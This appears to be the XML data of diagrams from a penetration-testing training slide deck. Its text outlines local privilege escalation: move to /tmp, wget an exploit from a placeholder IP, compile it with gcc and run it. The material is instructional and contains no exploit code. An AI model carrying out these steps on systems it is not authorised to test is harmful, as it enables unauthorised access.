    <dgm:cxn modelId="{C4000DC4-05EF-41EC-8BEA-B82FA59D1F60}" srcId="{2E8A1B2B-ABD2-4694-BB6A-B3E03F0FDB40}" destId="{C929937D-7E48-4013-92A6-94D9B671FAB0}" srcOrd="1" destOrd="0" parTransId="{91D6C797-9494-453B-AE0D-241ABD677BF6}" sibTransId="{8E843FC0-4194-4EDD-8B71-F9652963F38D}"/>
    <dgm:cxn modelId="{B2DD0262-2FDB-4A8A-B6F8-E18CD32991C0}" type="presOf" srcId="{831B3475-4450-4CEA-B932-3B7534E4ED23}" destId="{C4BF9FE7-AFE6-4CD9-A0BE-A52453C9F3B7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{7E68DB40-2E54-41B4-A9C4-91E4B3D777E0}" type="presParOf" srcId="{6D160832-694B-42A6-81F1-B204BBC82AD1}" destId="{C4BF9FE7-AFE6-4CD9-A0BE-A52453C9F3B7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{2B73C517-3133-4ABB-889C-DC4770FBB0CE}" type="presParOf" srcId="{6D160832-694B-42A6-81F1-B204BBC82AD1}" destId="{C760AE17-5F7C-403C-96B0-EB46CF7A9B0B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{1C22B75C-B1CE-4F1A-96E2-A108C944C205}" type="presParOf" srcId="{6D160832-694B-42A6-81F1-B204BBC82AD1}" destId="{623FEE27-2C37-45F3-A3AF-6C006838810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73193B-6909-48AD-8DB1-4A2285ABEA4D}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/vList5" loCatId="Inbox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B2E5388-BAAA-4012-BA1D-E5BFD6399588}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Goal</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A1CA12E1-CA72-4F03-8324-865B6C5EB2A5}" type="parTrans" cxnId="{32023ABA-F020-46C0-B5BB-3E65320CBD96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A4ED7D7-90D5-4084-8FD1-E9FA7C023A3A}" type="sibTrans" cxnId="{32023ABA-F020-46C0-B5BB-3E65320CBD96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D2617989-BB2A-4B2C-8063-C690CAA265F6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Obtain a higher degree of access than the current user</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{184FF003-560C-42DF-845C-4DFF36BA214B}" type="parTrans" cxnId="{7A958E45-BDCD-4782-A9E3-F6FBE27D9DA0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F18388D4-6AEF-4ED4-928A-714295B957A2}" type="sibTrans" cxnId="{7A958E45-BDCD-4782-A9E3-F6FBE27D9DA0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{680170DD-9054-478A-A797-6C1A296AEE0F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Method</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{69DCD8F0-10D2-4106-819C-8424CEC1E3DC}" type="parTrans" cxnId="{269FC96F-9C92-4EE9-9061-9D519F798FD1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7C6F3698-1FBD-4EFD-BED3-0063D01D9C1D}" type="sibTrans" cxnId="{269FC96F-9C92-4EE9-9061-9D519F798FD1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E783807F-68C0-4CBE-A5BD-A98705F36479}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Additional enumeration. Essentially the enumeration process restarts completely at this point.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AF570CEE-F7A0-44E1-BBEE-9260274CED75}" type="parTrans" cxnId="{D9644222-3F97-4F55-B88D-8ECA2BF4E175}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35BF0085-C8BC-4B59-A6B7-2F1D7D56BD5B}" type="sibTrans" cxnId="{D9644222-3F97-4F55-B88D-8ECA2BF4E175}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{615E33B8-3DB5-4928-BFB1-788122F12516}" type="pres">
      <dgm:prSet presAssocID="{3173193B-6909-48AD-8DB1-4A2285ABEA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DEFD85-5186-4F1F-A6F0-91ACC6B9B49F}" type="pres">
      <dgm:prSet presAssocID="{EB2E5388-BAAA-4012-BA1D-E5BFD6399588}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D6EA24D2-D007-4DA2-B2E9-89642914AEB0}" type="pres">
      <dgm:prSet presAssocID="{EB2E5388-BAAA-4012-BA1D-E5BFD6399588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4CECC-1F65-4099-A139-F4D80312019E}" type="pres">
      <dgm:prSet presAssocID="{EB2E5388-BAAA-4012-BA1D-E5BFD6399588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79018-FAF9-4701-AC22-05A56FA03478}" type="pres">
      <dgm:prSet presAssocID="{5A4ED7D7-90D5-4084-8FD1-E9FA7C023A3A}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{692ABA22-2C36-4C10-A926-66B689ABB325}" type="pres">
      <dgm:prSet presAssocID="{680170DD-9054-478A-A797-6C1A296AEE0F}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6EA9150F-F6FA-4815-A6D0-A472FDC10100}" type="pres">
      <dgm:prSet presAssocID="{680170DD-9054-478A-A797-6C1A296AEE0F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EFFE0-F236-4E63-9E3A-7C101E75D683}" type="pres">
      <dgm:prSet presAssocID="{680170DD-9054-478A-A797-6C1A296AEE0F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459997-77C2-4D5C-931E-C756D09579B9}" type="presOf" srcId="{E783807F-68C0-4CBE-A5BD-A98705F36479}" destId="{6EAEFFE0-F236-4E63-9E3A-7C101E75D683}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{269FC96F-9C92-4EE9-9061-9D519F798FD1}" srcId="{3173193B-6909-48AD-8DB1-4A2285ABEA4D}" destId="{680170DD-9054-478A-A797-6C1A296AEE0F}" srcOrd="1" destOrd="0" parTransId="{69DCD8F0-10D2-4106-819C-8424CEC1E3DC}" sibTransId="{7C6F3698-1FBD-4EFD-BED3-0063D01D9C1D}"/>
    <dgm:cxn modelId="{7A958E45-BDCD-4782-A9E3-F6FBE27D9DA0}" srcId="{EB2E5388-BAAA-4012-BA1D-E5BFD6399588}" destId="{D2617989-BB2A-4B2C-8063-C690CAA265F6}" srcOrd="0" destOrd="0" parTransId="{184FF003-560C-42DF-845C-4DFF36BA214B}" sibTransId="{F18388D4-6AEF-4ED4-928A-714295B957A2}"/>
    <dgm:cxn modelId="{9407DB5D-BDBF-4A51-9E49-B95828A31887}" type="presOf" srcId="{EB2E5388-BAAA-4012-BA1D-E5BFD6399588}" destId="{D6EA24D2-D007-4DA2-B2E9-89642914AEB0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{32023ABA-F020-46C0-B5BB-3E65320CBD96}" srcId="{3173193B-6909-48AD-8DB1-4A2285ABEA4D}" destId="{EB2E5388-BAAA-4012-BA1D-E5BFD6399588}" srcOrd="0" destOrd="0" parTransId="{A1CA12E1-CA72-4F03-8324-865B6C5EB2A5}" sibTransId="{5A4ED7D7-90D5-4084-8FD1-E9FA7C023A3A}"/>
    <dgm:cxn modelId="{D9644222-3F97-4F55-B88D-8ECA2BF4E175}" srcId="{680170DD-9054-478A-A797-6C1A296AEE0F}" destId="{E783807F-68C0-4CBE-A5BD-A98705F36479}" srcOrd="0" destOrd="0" parTransId="{AF570CEE-F7A0-44E1-BBEE-9260274CED75}" sibTransId="{35BF0085-C8BC-4B59-A6B7-2F1D7D56BD5B}"/>
    <dgm:cxn modelId="{E901712E-2E3F-48C8-B199-832E1D2CBAD3}" type="presOf" srcId="{3173193B-6909-48AD-8DB1-4A2285ABEA4D}" destId="{615E33B8-3DB5-4928-BFB1-788122F12516}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{55EA2D5F-3C23-4BCE-A407-91CFEC7DEF74}" type="presOf" srcId="{680170DD-9054-478A-A797-6C1A296AEE0F}" destId="{6EA9150F-F6FA-4815-A6D0-A472FDC10100}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{35438FB5-7852-4B92-9578-8625403ACB2D}" type="presOf" srcId="{D2617989-BB2A-4B2C-8063-C690CAA265F6}" destId="{0CA4CECC-1F65-4099-A139-F4D80312019E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{AAE901C1-6B8F-48C0-A1D4-CB34FB86AD61}" type="presParOf" srcId="{615E33B8-3DB5-4928-BFB1-788122F12516}" destId="{97DEFD85-5186-4F1F-A6F0-91ACC6B9B49F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0161534A-7CEF-4377-9B36-5E983CCE42E8}" type="presParOf" srcId="{97DEFD85-5186-4F1F-A6F0-91ACC6B9B49F}" destId="{D6EA24D2-D007-4DA2-B2E9-89642914AEB0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EF20EFDA-6B21-4966-B693-A4B715513250}" type="presParOf" srcId="{97DEFD85-5186-4F1F-A6F0-91ACC6B9B49F}" destId="{0CA4CECC-1F65-4099-A139-F4D80312019E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{FDA87ACB-7AA8-4F98-A515-C728C7402F71}" type="presParOf" srcId="{615E33B8-3DB5-4928-BFB1-788122F12516}" destId="{7E779018-FAF9-4701-AC22-05A56FA03478}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{5D8A03EE-09F1-49B5-AE39-F1F16AF5224A}" type="presParOf" srcId="{615E33B8-3DB5-4928-BFB1-788122F12516}" destId="{692ABA22-2C36-4C10-A926-66B689ABB325}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EE2B9CEB-D8C5-46D4-961F-70B63CD3CF5C}" type="presParOf" srcId="{692ABA22-2C36-4C10-A926-66B689ABB325}" destId="{6EA9150F-F6FA-4815-A6D0-A472FDC10100}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F5464BCA-E3BE-4F05-A8B0-9CB80F9447C7}" type="presParOf" srcId="{692ABA22-2C36-4C10-A926-66B689ABB325}" destId="{6EAEFFE0-F236-4E63-9E3A-7C101E75D68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73193B-6909-48AD-8DB1-4A2285ABEA4D}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/vList5" loCatId="Inbox" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple2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EB2E5388-BAAA-4012-BA1D-E5BFD6399588}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Navigate</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A1CA12E1-CA72-4F03-8324-865B6C5EB2A5}" type="parTrans" cxnId="{32023ABA-F020-46C0-B5BB-3E65320CBD96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A4ED7D7-90D5-4084-8FD1-E9FA7C023A3A}" type="sibTrans" cxnId="{32023ABA-F020-46C0-B5BB-3E65320CBD96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C79AE795-9F89-4A52-80FC-1FA40C6BCE7E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Navigate to a writable directory</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{59C24103-AD78-4823-80D9-7D5187EB955A}" type="parTrans" cxnId="{3D092AB8-5409-42E6-B6A1-B9FFDD2D4820}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0E842B29-BC90-4BCF-91A0-AAAC5FF26ACD}" type="sibTrans" cxnId="{3D092AB8-5409-42E6-B6A1-B9FFDD2D4820}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{98AA85D1-6961-4DF9-A955-23B6345C34D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>“cd /tmp”</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1BC56EF2-C32B-4924-A4B3-72E6DEC30C8B}" type="parTrans" cxnId="{D6F0AC8C-47F4-434A-90FB-9832637D1F06}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F14F6494-101D-420A-A543-0F3F282295FF}" type="sibTrans" cxnId="{D6F0AC8C-47F4-434A-90FB-9832637D1F06}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{107AB32F-0828-470C-B90A-4ABF24E54769}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Download</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C93E4765-B212-4E72-90F9-FE4E745EF456}" type="parTrans" cxnId="{EF52732A-F583-4BAC-82EA-2038AD290F87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D6A61F3D-B1AE-427A-8938-5C91B15DD5DD}" type="sibTrans" cxnId="{EF52732A-F583-4BAC-82EA-2038AD290F87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{711B2AD0-F324-400C-AD25-BCE43F971AA1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Download exploit to target machine</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{171CB726-BA46-4540-A631-B31D120B49C8}" type="parTrans" cxnId="{0555F33C-BD2A-42CC-8AF7-C5A135B106F5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{57CE444D-B1E9-485D-AA90-E8BF7162F176}" type="sibTrans" cxnId="{0555F33C-BD2A-42CC-8AF7-C5A135B106F5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{93DC16D8-955A-43F5-BA7C-94A6614705AF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>“wget http://&lt;IP&gt;/exploit.c</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64BB2207-933D-49A0-B8A0-279697B6F68C}" type="parTrans" cxnId="{36867E61-EA9F-4687-BB83-BD587C1E0E41}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FF68A067-024E-4D86-99BF-C8A814331B5B}" type="sibTrans" cxnId="{36867E61-EA9F-4687-BB83-BD587C1E0E41}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{67861048-E688-48B3-8341-37BA10358FA4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Compile</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2AD35236-676B-490D-A4D8-B40BA42C3D06}" type="parTrans" cxnId="{617537D4-EF2F-4440-8650-248E0F6CBBA3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60FF9783-A18A-4B73-A43F-71A9755707E0}" type="sibTrans" cxnId="{617537D4-EF2F-4440-8650-248E0F6CBBA3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{42DC93E3-1FF3-4903-989B-96464CCEECAE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Compile exploit with gcc</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9670F6A1-C18E-4CAA-AC5E-F0BB5A0F4440}" type="parTrans" cxnId="{788E8356-ACD1-4DCE-83BA-A4EB9EFF516E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A86A7B78-5FA4-4299-8D49-57AF405970AA}" type="sibTrans" cxnId="{788E8356-ACD1-4DCE-83BA-A4EB9EFF516E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C7B9970A-22FF-4F5D-8CA9-AA1745EC2EFD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>“gcc exploit.c -o exploit”</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2E02F314-8295-41F5-B005-F9935F052171}" type="parTrans" cxnId="{63B452EC-64D8-4CDB-AECB-2FAF5554E3EA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E93B09EA-35EF-410A-9224-2B08A7688BD4}" type="sibTrans" cxnId="{63B452EC-64D8-4CDB-AECB-2FAF5554E3EA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7DECE1FA-4B06-4D44-A313-EDA2E14EB22C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Run</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6BA9D465-8223-479E-9313-73DE9D4299F8}" type="parTrans" cxnId="{6402D3EA-6FA5-4046-BC7F-0266008407EA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2D25B5B9-073E-4A81-B05A-BD93DD5E6446}" type="sibTrans" cxnId="{6402D3EA-6FA5-4046-BC7F-0266008407EA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA0D78F2-8689-4664-91DC-96DDF362CF68}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Run exploit</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{84A7E56C-BA39-4149-9C91-8E0BA0F48E80}" type="parTrans" cxnId="{CBD488B7-B47F-4BF2-ACC7-68C7EFA8B323}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8A8E8BA1-0CDD-445E-B730-1F32BAA33B60}" type="sibTrans" cxnId="{CBD488B7-B47F-4BF2-ACC7-68C7EFA8B323}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{83B3078A-4F7D-4B04-BE8E-D96327989A81}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>“./exploit”</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{85197FEE-954D-4F0C-9678-A89ADBB12230}" type="parTrans" cxnId="{05D74322-1CED-4B7E-A146-71CB4D15DE48}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C80CECBE-329A-483D-A046-5E86ABF4C5E9}" type="sibTrans" cxnId="{05D74322-1CED-4B7E-A146-71CB4D15DE48}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{615E33B8-3DB5-4928-BFB1-788122F12516}" type="pres">
      <dgm:prSet presAssocID="{3173193B-6909-48AD-8DB1-4A2285ABEA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DEFD85-5186-4F1F-A6F0-91ACC6B9B49F}" type="pres">
      <dgm:prSet presAssocID="{EB2E5388-BAAA-4012-BA1D-E5BFD6399588}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D6EA24D2-D007-4DA2-B2E9-89642914AEB0}" type="pres">
      <dgm:prSet presAssocID="{EB2E5388-BAAA-4012-BA1D-E5BFD6399588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4CECC-1F65-4099-A139-F4D80312019E}" type="pres">
      <dgm:prSet presAssocID="{EB2E5388-BAAA-4012-BA1D-E5BFD6399588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79018-FAF9-4701-AC22-05A56FA03478}" type="pres">
      <dgm:prSet presAssocID="{5A4ED7D7-90D5-4084-8FD1-E9FA7C023A3A}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{34E22041-EAB0-4B87-AE7E-E09696A41040}" type="pres">
      <dgm:prSet presAssocID="{107AB32F-0828-470C-B90A-4ABF24E54769}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{58192DC6-BB82-4314-A3B9-4FECBD126BB1}" type="pres">
      <dgm:prSet presAssocID="{107AB32F-0828-470C-B90A-4ABF24E5476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874FD-D801-4D9B-8070-2165592A4B5B}" type="pres">
      <dgm:prSet presAssocID="{107AB32F-0828-470C-B90A-4ABF24E54769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D2E88A-BB19-473A-979B-8B9F07F8D50F}" type="pres">
      <dgm:prSet presAssocID="{D6A61F3D-B1AE-427A-8938-5C91B15DD5DD}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F8CEEDAD-287E-4C84-A756-A95632B65C41}" type="pres">
      <dgm:prSet presAssocID="{67861048-E688-48B3-8341-37BA10358FA4}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7E6D2615-16C0-44A5-9610-1724B74537AF}" type="pres">
      <dgm:prSet presAssocID="{67861048-E688-48B3-8341-37BA10358FA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D4EF0-97AA-4B9E-AAE5-2D0BA239EF6A}" type="pres">
      <dgm:prSet presAssocID="{67861048-E688-48B3-8341-37BA10358FA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C5C1B-44EB-45B6-A36E-1B3B38E855CD}" type="pres">
